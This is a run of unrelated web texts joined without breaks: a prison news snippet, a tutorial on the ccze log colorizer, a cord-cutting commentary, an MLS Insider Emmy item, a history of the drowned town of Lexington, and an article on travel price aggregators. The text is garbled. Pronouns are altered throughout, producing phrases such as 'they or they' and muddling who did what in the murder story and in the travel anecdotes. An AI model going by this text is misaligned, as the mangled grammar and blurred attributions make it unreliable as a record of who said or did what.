If McDonnell does end up at FCI Petersburg, WTVR CBS 6 legal analyst Todd Stone said he'll most likely be placed in the adjacent minimum security satellite camp where 309 inmates live.
According to the prison's 58-page orientation handbook, inmates are required to wear a green shirt and pants during the day, they can only have visitors on certain days, and they are required to work for the prison, doing jobs like cooking food or mowing grass.
Inmates there are also allowed to play a variety of sports, like tennis and bocce ball, and participate in activities like painting and crochet.
Depend on WTVR.com and CBS 6 News for complete coverage of this important story.
Colorize log files on CentOS and Ubuntu using ccze tool
ccze is a wonderful tool that brings real joy to the arduous task of reading or searching thru log files. It uses a modular approach to support custom colour formatting for popular applications such as Apache, Postfix, Exim, etc.
Install ccze on CentOS and Fedora linux
First enable Epel repository and run following command:
# yum install ccze -y
Install ccze on Debian/Ubuntu linux
On Debian/Ubuntu, you can use apt-get to install:
~$ sudo apt-get install ccze -y
How to use ccze tool
ccze colourises logs that are sent to standard out, for example, we can use tailf to follow a log file and then prettify the output by piping to ccze, examples:
~$ tail /var/log/syslog | ccze -A
~$ cat /var/log/syslog | ccze -h > ~/Desktop/syslog.html
Export log files to html file using ccze tool:
Example:
This tool comes with plenty of options. You can customize it more in these files
/etc/cczerc, $HOME/.cczerc
To see list of plugins available just do
$ ccze -l
Example output:
~$ ccze -l Available plugins: Name | Type | Description ------------------------------------------------------------ apm | Partial | Coloriser for APM sub-logs. distcc | Full | Coloriser for distcc(1) logs. dpkg | Full | Coloriser for dpkg logs. exim | Full | Coloriser for exim logs. fetchmail | Partial | Coloriser for fetchmail(1) sub-logs. ftpstats | Full | Coloriser for ftpstats (pure-ftpd) logs. httpd | Full | Coloriser for generic HTTPD access and error logs. icecast | Full | Coloriser for Icecast(8) logs. oops | Full | Coloriser for oops proxy logs. php | Full | Coloriser for PHP logs. postfix | Partial | Coloriser for postfix(1) sub-logs. procmail | Full | Coloriser for procmail(1) logs. proftpd | Full | Coloriser for proftpd access and auth logs. squid | Full | Coloriser for squid access, store and cache logs. sulog | Full | Coloriser for su(1) logs. super | Full | Coloriser for super(1) logs. syslog | Full | Generic syslog(8) log coloriser. ulogd | Partial | Coloriser for ulogd sub-logs. vsftpd | Full | Coloriser for vsftpd(8) logs. xferlog | Full | Generic xferlog coloriser.
For more ccze optioins see man pages.
Commentary
Can you cut your monthly TV bill by cutting the cord?
That may seem like a silly question. Eliminate your cable and/or satellite TV service and you will also eliminate $100 or more in monthly expenses. Right?
Well, there have been several articles lately that suggest that cutting the cord does not mean cutting your expenses. For instance, the Los Angeles Times recently published this piece (“Cutting the cord doesn't necessarily mean cutting the costs”) that says:
“Cord cutting has been heralded as a consumer-friendly revolution that lets audiences pay only for the content they enjoy. But as the market becomes more crowded and competitive, it's uncertain whether digital-only services will necessarily prove less expensive than the cable and satellite services they're quickly supplanting.”
Other publications recently have noted that if you subscribe to Netflix, Hulu, Amazon Prime, at least one live streaming service, such as Sling TV, and get Internet service, your monthly bill will exceed your old cable bill.
There are also numerous articles on the other side of the fence that say cutting the cord can save you hundreds of dollars every year.
So, who's right?
Both.
As it happens all too often in today's media, the narrative — the point of view that the author and/or publication wants to emphasize — comes before the facts.
Of course, cutting the cord can save you money. That is, if you only subscribe to Netflix, and a decent Internet service. The total bill for those two will likely fall under $50 a month, compared to more than $100 a month for a video and Internet plan from a pay TV service. Even if you add Hulu or Amazon Prime to your ‘cord-cutting' bundle, you would still save money.
However, if you watch a lot of TV, you probably won't be satisfied with those options and you might add a few more services such as Sling TV, HBO Now, DIRECTV Now, or Showtime, and suddenly your bill is creeping close to $100 a month or more.
See my point.
Cord cutting is not a science with a ‘one plan fits all' solution. Everyone is different, and will want different programming options when cutting the cord. Consequently, the person who watches a moderate amount of television will probably be happy with Netflix and perhaps Hulu and will indeed save money if they or they cut the cord.
But the so-called TV addict will probably end up paying just as much as they or they did after every new streaming subscription is ordered.
Bottom line: Ignore the debate going on in today's newspapers and web sites. If you want to cut the cord, look at your own situation and what you will need. That's the only sure way to determine if cutting the cord actually cuts expenses.
— Phillip Swann
Share this: Twitter
Facebook
Following a debut season in 2013 that took fans and viewers deep inside numerous untold tales of MLS players, coaches and history, NBCSN's MLS Insider has been nominated for a 2014 Emmy Award in the category of Outstanding Sports Documentary Series.
"We're thrilled that the stars and the stories from MLS have received this recognition from our industry peers," said Howard Handler, MLS Chief Marketing Officer, of the honor. "We're also incredibly grateful for the creative vision of Jonathan Hock and everyone at Hock Films. As we march to Brazil, Season II will continue to deliver rich storytelling to our fans. Stay tuned!"
Directed by Jonathan Hock, an eight-time Emmy winner and current overseer of ESPN's upcoming Inside: US Soccer's March to Brazil series, MLS Insider debuted in June 2013 and ran 16 episodes in its first season.
The documentary series recently returned for its second season, via KICKTV and MLSsoccer.com, as it will continue to do each week throughout the 2014 season.
Post Updated on April 13, 2016
Thanks to the plentiful El Niño rains, in early April, Lexington Reservoir was at 69% capacity. That's compared to 23% in February of this year. At current levels, the entire ghost town of Lexington is submerged beneath the reservoir's surface. Nonetheless, the rich history has stayed afloat.
Original Post October 31, 2014
As you drive over Highway 17 past the Lexington Reservoir, the water level reminds you whether it's been a particularly wet or dry year but probably not of the two towns that disappeared with the rising waters. In the third year of a statewide drought, the water is currently low enough to reveal the flooded remains of the ghost towns of Lexington and Alma. An old bridge. The stone foundations of family homes. The cement ribbon of the old Santa Cruz Highway. Today's reservoir was named after one of these towns, which was a stage coach stop en route to Santa Cruz. The town of Lexington burned bright for a short while, profiting from the logging industry and achieving infamy from a brutal murder.
Home to the first sawmill in Santa Clara County, the town of Lexington (first called Jones' Mill) was established in 1857. By the year 1867, Lexington was the main commerce center between San Jose and Santa Cruz. Los Gatos, then called Forbes Mill, was just a small crossroads in its large shadow. Lexington profited from heavy logging of the virgin redwood forests that grew thickly throughout the Santa Cruz Mountains and from high-quality leather and tan bark that was in high demand at the tanneries in Santa Cruz County. Pack mules delivered the tan bark through the mountains to Santa Cruz, and, although less than 25 miles, the trip in those days was a far cry from today's 30-minute drive.
Before the 1850s, there were no roads between Santa Clara and Santa Cruz County. It took three long, grueling days to travel between what is now Los Gatos and the summit (less than 15 miles), bushwhacking through thick brush on steep terrain either by foot or on horseback. By Lexington's heyday in 1867, a group of Santa Cruz County residents had constructed the Santa Cruz Turnpike. This was a huge improvement to the first dirt road that was so steep and narrow that wagons had to lighten their loads and take several trips, and the cattle, horses, and oxen were always in danger of a fatal slip off the road's edge.
The Santa Cruz Turnpike was eight feet wide, built largely by hand, and a much easier passage for horses and wagons. Still, many accidents occurred and it was not an easy road. Through one section, the highway crossed Soquel Creek 25 times without any bridges. The first toll house was located in Lexington. The toll for a wagon and two horses or oxen to pass was 50 cents.
Saloons as Prevalent as Starbucks
The Lexington House Hotel and saloons were busy with tourists, commuters, bandits, and gamblers before the roads were rerouted to bypass the town. In the 1890s, when alcohol was illegal in Los Gatos, 12 saloons lined the road between Lexington and its neighboring town, Alma.
A Murderous Past
It was a tumultuous period for Santa Clara County. Besides the ghosts of bandits and gamblers, the victims of a brutal murder and their killers haunt the reservoir's waters.
In 1883, saloon-keeper Lloyd L Majors of Los Gatos sent rancher John Showers and painter Joseph Jewell with a pistol and a pair of pliers to the mountain cabin of the well-liked William Renowden. Rumored to have $20,000 in gold stashed throughout their cabin, Renowden and their partner Archibald McIntyre met an unlucky fate that day. The pliers were brought as a torture device to pull off Renowden's fingernails one by one until they revealed where they hid their gold. Whether or not the pliers were used is unclear, but either way, two good men lost their lives for the sake of greed.
Showers and Jewell shot Renowden and McIntyre, lit a match, and set fire to the house before fleeing with the gold. Both bodies were found in the smoldering remains of the cabin. The story ends with the violent deaths of all three murderers: Jewell was executed by hanging at San Quentin, Showers was stabbed to death in a prison fight, and the plotting Majors died in a prison break at Folsom Prison.
The murder trial received national coverage and made Lexington infamous for a while, but infamy lasts only so long.
Lexington's Demise
After Lexington lumber mills had clear-cut all the virgin redwoods in the area, the mills moved to Los Gatos, which depleted the town's economy. The post office was then moved to the neighboring town of Alma in 1873, partly due to complaints from church-goers that women and children had to pass through the rowdy Lexington saloon to reach the post office located in the back. Then in 1880, the new railroad bypassed Lexington completely, favoring Alma instead. Most of Lexington's families moved to Alma soon after, and the town dwindled and quieted to a mere whisper of what it once was.
The town hung on, with fewer than a dozen families still residing there, until the construction of the dam in 1952. Even then, an old woman refused to leave their home, preferring to hold their ground even as their house was lifted from its foundation and carted away.
Today, when the water level of Lexington Reservoir dips low enough, you can walk the same ground as the ghosts of Lexington, searching for remnants of a time gone by.
Take the Self-Guided Mobile Tour
This piece is part of the Highway 17 Tour. Download the free app with many tours of the Santa Cruz area and beyond.
Last August, Andrea Giacobbe logged on to Skyscanner, a European metasearch engine like Expedia and Travelocity that scans multiple travel websites and surfaces the cheapest fare. Giacobbe, a 52-year-old management consultant, was looking to book a flight from New York City to Genoa, Italy—a trip he's made numerous times for family visits. He'd always relied on Skyscanner for a discount. This time, the cheapest fare wasn't that cheap: It was for an Alitalia flight that made two stops, through Milan and Rome, for $2,050. Surprised at the high quote, they decided to call Alitalia. Immediately, the airline offered a $1,550 flight with only one stop in Rome. It was cheaper. It would get there faster. They even offered them a discounted car rental.
“It blew my mind,” recalled Giacobbe. They hadn't called Alitalia directly in years. They were accustomed to almost always relying on Skyscanner for the best deal.
Sign up to get Backchannel's weekly newsletter.
Giacobbe's experience is becoming more typical. Over the past several years, the conventional wisdom has been that cruising the net would yield the best prices in the travel, hotel, and car rental spaces. There's been a tidal shift in the travel industry, to a point where most of us use aggregators to book our trips. Who bothers talking to a human being—a travel agent? You're just going to be stuck in a long option queue.
Most of us rely on metasearch engines, like Priceline, Expedia, or Travelocity, which typically use dozens (sometimes as many as 200) of online travel agents, called OTAs, and aggregators to find the best deals. (A metasearch engine and an aggregator are interchangeable terms — they both scour other sites and compile data under one roof. An OTA is an actual travel agency that actually does the booking and is the lone site responsible for everything you buy through them.) We rely on these sites because we assume they have the secret sauce — the most powerful search engines, tweaked by superstar programmers armed with the most sophisticated algorithms—to guide us to the cheapest options. With a single search, you can feel assured that you are paying a rock bottom price.
Over time, however, the convention has flipped. As competition among the sites heated up, the hard-to-believe cheap fares required some filtering. A too-good-to-be-true fare ($99 to Europe from California) usually came with a catch (the $400, indirect, ticket home). And as the business models that on which these aggregators rely are getting tighter, the deals are getting worse. How can you be certain you're getting the lowest quote? The short answer is, you can't.
While reporting this piece I spoke to several software engineers, executives of hotel chains, as well as academics and researchers who have spent a considerable amount of time and effort digging into the issue. Their conclusion is that the industry is in flux, and that really good bargains—for hotels, flights, and car rentals—are often largely illusory. “Hotels are not giving the aggregators as many good deals as they did in the past,” a former software engineer who used to work for Priceline told me. (He didn't want their name used because they still are seeking work in the industry.) “You might as well call Sheraton's front desk.”
And good luck finding the delinquent parties: The number of players behind each transaction has ratcheted up. For every potential deal, there are likely to be multiple aggregators in the food chain, with each site taking a cut and ultimately driving up the final cost. My ex-Priceline source told me that aggregators explain away price fluctuations by citing the ebb and flow of supply and demand, which varies greatly in seasonal resort areas. But really, it's a breakdown in the system. Just as airlines and hotels began trimming travel agent commissions more than 20 years ago, now history is repeating itself. “The airlines don't want to pay the aggregators anymore,” they told me.
Which means the people who are paying them are us.
As early as the 1990s, before the ubiquity of the internet, you called your travel agent and they or they took care of everything — your flights, the hotel, the rental car. America Airlines, the Hyatt, Hertz and the like paid the travel agents to offer their services. But slowly, the landscape changed. The airlines and hotel chains stopped paying. Travel agents stopped offering their services for “free.” The consumer shouldered their fees, and travel agents became irrelevant players to all but the boutique wealthy travelers who didn't need to worry about cost.
Technology aided in this inevitable disruption, and ultimately helped create some of the pricing chaos we see today. As the internet became the first stop for travel shopping, we started searching for bargains via keystroke commands. We stopped talking to hotel clerks, rental car agents, and airline reservation agents, and we boasted to our friends about our low-cost vacations to Lake Como.
All of this was made possible by the web aggregators.
Web aggregators work like this: When you type in where you want to go, when you want to go, or where you want to stay, the aggregators give you a list of options. The vendors set the prices of the options, not the aggregators, and adjust them at their will. The aggregators are paid by the click, but if you book a plane or hotel room through them, they get a larger commission from the company. Most of the contracts with online travel sites do not allow them to undercut the hotels' or airlines' rates.
In the early days of online booking, sites like Kayak and Orbitz were able to cut deals with hotel chains and airlines by asking for blocks of empty hotel rooms or airline seats that normally went unsold. A Delta or Starwood could justify paying high commissions for a booking because any sale was better than an empty seat or a vacancy. But as more aggregators popped up the business model was shaken; there were suddenly layers of players, all looking for a piece of your booking. As search technology became more powerful and accessible, more and more hotel rooms were being sold at third-party sites.
Commercial vendors have also taken advantage of the technology to delve into your shopping behavior. Browser cookies give information to aggregators that can trigger price disparities. Your zip code and even your device can make a difference. For example, if you're looking for a hotel room at 5 p.m. for that evening and you're using your phone to search, the aggregator's algorithm will assume you're more desperate than if you were using your desktop computer. “Every time you look at a deal, your search is recorded somewhere,” the ex-Priceline programmer told me.
The hospitality industry has responded to all of this by trying to sell rooms without paying commissions. I talked to a CEO in California that runs a corporation consisting of a handful of resort hotels (he also didn't want to be identified). They told me that in the past few years, the large chains have ramped up advertising and promotion, often by gussying up their own websites and offering easy entry rewards programs by booking directly through their sites.
I wondered about the deals offered by TripAdvisor, which advertises itself as the best metasearch engine to get the cheapest prices. Brian Hoyt, the head of corporate communications, insisted that its new “instant book technology” scours all of the current available rates from all the major OTAs and aggregators. They said the company has struck major deals with Hilton, Starwood, and Marriott, among other large hotel chains.
TripAdvisor, which bills itself as the “world's largest travel site,” may be desperate for other deals. (It's latest financial statement shows negative cash flow in the hotel sector, so business is not exactly thriving.) When I pressed Hoyt about equaling or beating the offers on Hilton's site, they evaded the question. If you check TripAdvisor's results against any of Hilton's hundreds of thousands of rooms, you will see that the cheapest Hilton rooms are found on their own site.
Search results for a room at the Hilton Garden Inn in New York City the weekend of May 26th—TripAdvisor, top, and the Hilton's website, bottom.
Consolidation, mergers, and acquisitions of the aggregators have driven up prices even higher. Expedia owns Hotels.com and a dozen-plus sites, including Travelocity, Orbitz, and Trivago. Behind the scenes, Expedia licenses out access to its databases and technology, so it's very easy for someone to set up a “new” aggregator business that is really just another version of Expedia under a different name. Pretty much anyone can get in the game by paying for access to the Central Reservation System, or CRS, for hotel rooms, or the Sabre or Amadeus data bases that list the prices of almost every airline and flight, with up-to-date fluctuations in fares.
“Every middle man wants to get a piece, and so there are small fees that go everywhere,” said Christo Wilson, the head of the Algorithm Auditing Research Group at Northeastern University's College of Computing and Information Science. Two years ago they spent months researching aggregator behavior, using a team of 300 volunteers. Their team discovered that dynamic pricing (shifts due to supply and demand, and dictated by mouse-click traffic) also led to price discrimination and “steering,” where consumers were led to sites that weren't necessarily the best deals.
Wilson's group noted that Orbitz was steering Apple OSX users, for example, to more expensive hotels, since the algorithm assumed that an Apple user was more affluent than a PC user. The company denied the accusation but ended the practice. In a response to Wilson's research, the company said using the macOS was just an “experiment” and “short-lived.”
As OTAs became more prominent, it also becomes more difficult to complain to the front desk. Today's complaint department has many hidden layers guarding it. And it may be harder than ever to find it when something goes wrong when you book through an aggregator. As the number of aggregators have grown, it's become more difficult to pinpoint the responsible party when a guest has a problem with a booking. Yelp and other review sites boast thousands of reviews from unhappy customers wondering how their reservations mysteriously disappeared on arrival.
Wilson says the problem is the sheer volume of players. Search any app store and you'll find dozens of companies that allow you to book hotel rooms—but most of the sites have never corresponded directly with the company. “They're just a layer that resells from someone else's database,” Wilson told me. So when a customer has a problem, it's difficult to know who to go to—as Wilson said, because “once the stack is sufficiently deep, it's impossible to say who actually made the sales.”
There are already signs that computer and smartphone users are wizening up. Sarah Hughes, a cofounder of travel industry consulting firm Fiz, has reported that research shows that “the majority of users now prefer to book directly via airlines and hotels rather than rely on online travel agencies….What does this tell us? That consumers are more interested in travel brands than they are in having information pre-filtered according to a narrow set of perceived needs.”
But it also tells us something far more important. It reveals that consumers are no longer taking for granted that aggregators offer the best deals. “The price compare sites are mostly a waste of time,” Tom Lewis, a self-proclaimed travel industry insider, wrote on Quora. “The only deals are on last minute unsold inventory in off-season periods. You can get those discounts by calling yourself or better yet booking with a good agent.”
He's right: The price control pendulum is swinging back toward the hoteliers. “It was really easy for the aggregators to gobble up all this business in the past because the hotels weren't really paying any attention,” that West Coast CEO told me. But eventually, the aggregators cornered so much of the market that they jacked up their commissions high enough that everyone had to take notice. The CEO revealed that their hotels typically paid aggregators 20 percent commission—and in many cases even 30 percent.
In past two or three years the hotel industry has been fighting the aggregators by offering deals that wiggle around the contracts they originally set with them. Let's say, for example, your hotel chain has a set rate for a room. You enter in an agreement with an aggregator that says you won't further discount the rate that is the “lowest price” a customer can find on the internet. But you can get around it by offering a potential guest an instant membership in your “loyalty” program. You can throw in additional “amenities” (parking, spa, and so on) that would normally cost extra and you would not be violating your agreements by undercutting the base price of the room. Tricky? You bet.
In February 2016, the Hilton Hotels Corporation decided to challenge aggregators with a bold plan: guaranteeing the lowest possible rate if you went right to the source, its own website. The push came with a marketing slogan, “Stop Clicking Around,” and a series of TV ads featuring the Rolling Stones' “Satisfaction.” Chris Silcock, the chain's chief commercial officer, told me that it was the largest, most expensive marketing push in the chain's 97-year history. Hilton is a perfect test case: If Expedia is the elephant in the aggregator space, Hilton is the elephant in the hospitality industry. Its subsidiaries have 775,000 rooms in 4,700 hotels in 550 locations on six continents.
Silcock said the campaign was a huge success. The subtle sales gimmick behind the plan was to get first-time guests to sign up for the Hilton's honors rewards program. Membership over the last year has doubled, from three million to six million with a total of 60 million now in their database. And much of the growth was via the hotel chain's smartphone app. “You don't have to join our club,” Silcock said, “but it will give you a better price.”
The Intercontinental Hotels Group, which owns several brands from Holiday Inns to Candlewood Suites, also announced a slightly less aggressive campaign. Beginning this year, it will not offer rewards points if guests book through aggregators.
Last October, I checked the online price of a Hilton Embassy Suites room in Fort Lauderdale for a weekend in January. A listing of $349 a night was quoted by TripAdvisor, PriceFinder, Hotels.com, and Expedia. The Hilton website quoted me a price of $331.
You can pat yourself on the back clicking around, looking for a cheap hotel room or a great airfare. But it might be better to resort to an old technology: Just pick up the phone and call the front desk.
